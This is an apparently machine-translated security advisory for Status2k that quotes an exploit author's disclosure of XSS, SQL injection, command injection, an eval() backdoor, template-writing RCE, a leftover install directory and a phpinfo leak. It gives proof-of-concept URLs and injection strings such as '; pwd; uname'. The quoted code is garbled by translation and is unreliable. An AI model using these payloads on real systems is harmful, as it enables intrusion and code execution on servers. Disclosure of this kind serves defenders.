Status2k Remote Command Injection Vulnerability (CVE-2014-5090)

Status2k Remote Command Injection Vulnerability (CVE-2014-5090)

Release date:
Updated on:

Affected Systems:
Status2k Status2k
Description:
--------------------------------------------------------------------------------
Bugtraq id: 69017
CVE (CAN) ID: CVE-2014-5090
 
Status2k is a self-managed server statistics dashboard that allows you to quickly view Server clusters.
 
Status2k does not effectively filter user input in addlog. php. A security vulnerability exists in implementation. After successful exploitation, attackers can execute arbitrary commands in the context of the affected application.
 
<* Source: Shayan Sadigh
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
# Exploit Title: Status2k Multiple Vulnerabilities/0 days
# Date: 6/20/2014
# Exploit Author: Shayan sadweigh (twitter.com/r1pplex) | <ienjoy.ripples@gmail.com
# Vendor Homepage: http://status2k.com/
# Version: All
# Tested on: Linux/Windows
# CVE: CVE-2014-5088, CVE-2014-5089, CVE-2014-5090, CVE-2014-5091, CVE-2014-5092, CVE-2014-5093

1. Cross site scripting/XSS... there's tons, example
Admin login page, etc

Login. php:

If (isset ($ _ GET ['username']) {$ useren = $ _ GET ['username'];}
If (isset ($ _ POST ['Password']) {$ useren =$ _ POST ['username'];}
$ Q = mysql_query ("SELECT * FROM". $ prefix. "users ");
$ Adminuser = $ res ['adminuser']; // Login Database
$ Cusername = $ _ COOKIE ["S2KUser"];
If ($ cusername = $ adminuser) & ($ cpassword = $ adminpass) {$ lgtrue = 1 ;}
If ($ useren = $ adminuser) & ($ passen = $ adminpass )){
Setcookie ("S2KUser", $ useren );
If ($ passen & $ useren ){
If ($ useren! ==$ Adminuser) {echo '<div class = "alert-message error"
Username ('. $ useren.') Incorrect. </div ';}
<Input type = "text" name = "username" size = "25"

Simple injection can be done in the username field, <scriptalert ("poc") </script, etc

Use CVE-2014-5088 for all of the XSS issues.

2. SQLi vulnerability in the GET (log)
Param... This isn't too useful seeing that if you had auth,
Much more damage cocould be done-refer to command injection
Lack of sanitization: in/admin/options/logs. php

$ L = $ _ GET ['log'];
$ Q = mysql_query ("SELECT * FROM". $ prefix. "users ");
$ Query = mysql_query ("SELECT * FROM". $ prefix. "logs WHERE id = '". $ l ."'");
$ Result = mysql_fetch_array ($ query) or die (mysql_error ());
$ Query = mysql_query ("SELECT * FROM". $ prefix. "logs WHERE id = '". $ l ."'");
$ Result = mysql_fetch_array ($ query) or die (mysql_error ());
$ Query = mysql_query ("SELECT * FROM". $ prefix. "logs WHERE id = '". $ l ."'");
$ Result = mysql_fetch_array ($ query) or die (mysql_error ());

-PoC: site.com/s2kdir/admin/options/logs.php? Log = [sqli]

Use CVE-2014-5089.

3. Command injection
This requires access to the Status2k Admin
Panel, log-in and proceed to click the 'logs' tab, then select
'Add logs', type in any name and for the 'location' field use
Command injection... Then browse to the created log via the 'logs'
Tab again.

-Example: Logs -- Add Logs --; then Logs -- newly created log

Name: test Location:/var/log/dmesg; pwd; uname-
Localhost/admin/options/addlog. php? Type = edit & id = 5

So there's no sanitization in addlog. php which lets you put anything
You want as a log location... the issue now is that in logs. php:

$ Logc = cmdrun ($ config ['logcmd']. $ result ['location']);
$ Log = explode ("\ n", $ logc );
$ Log = array_reverse ($ log );

Cmdrun literally callthe equivalent of exec () and thus completely
Execution of a command.

If it is complaining about dmesg... try other log locations... such
/Usr/local/apache/logs/suexec_log, also try other bash chars, such

| &; $ (), Etc

Use CVE-2014-5090.

4. eval () [RCE] backdoor ..
For about a year, status2k.com was hosting a backdoored version
Of their software... either they knew it or not, there was never
Announcement when the backdoor was found (good job ).

In the file/functions des/functions. php:
Eval ($ _ GET ['multies ']);

Site.com/s2k/includes/functions.php? Multies = inject_php_code here

PoC: site.com/s2k/includes/functions.php? Multies = echo 'foobar ';

Use CVE-2014-5091.

5. Another RCE
Status2k also lacks sanitization in the templates;/admin/options/editpl. php

One can literally place any malicious php code they want here and have it execute

// Let's make sure the file exists and is writable first.
If (is_writable (".../../templates/". $ config ['templaten']. "/". $ filename )){

// In our example we're opening $ filename in append mode.
// The file pointer is at the bottom of the file hence
// That's where $ somecontent will go when we fwrite () it.
If (! $ Handle = fopen (".../../templates/". $ config ['templaten']. "/". $ filename, 'w ')){
Echo "Cannot open file (.../../templates/". $ config ['templaten']. "/". $ filename .")";
Exit;
}

// Write $ somecontent to our opened file.
If (fwrite ($ handle, $ value) === FALSE ){
Echo "Cannot write to file (../templates/". $ config ['templaten']. "/". $ filename .")";
Exit;
} Else {
Echo "Success, $ filename updated! ";

Once again complete lack of sanitization.

Use CVE-2014-5092.

6. Design flaw by default Status2k does not remove the install
Directory (/install/), this may lead to an attacker resetting
Admin credentials and thus logging in and causing further damage
Through RCE vectors listed above.

Use CVE-2014-5093.

7. Information leak... it is not shown by default on the index. php
Of status2k above version 2, however // PHPINFO =============== //
===========================$ Action =$ _ GET ["action"]; if ($ action =
"Phpinfo") {phpinfo (); die ();} allows anyone to view the server's
Phpinfo page (localhost/status/index. php? Action = phpinfo)

Use CVE-2014-5094.

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Status2k
--------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://status2k.com/

This article permanently updates the link address: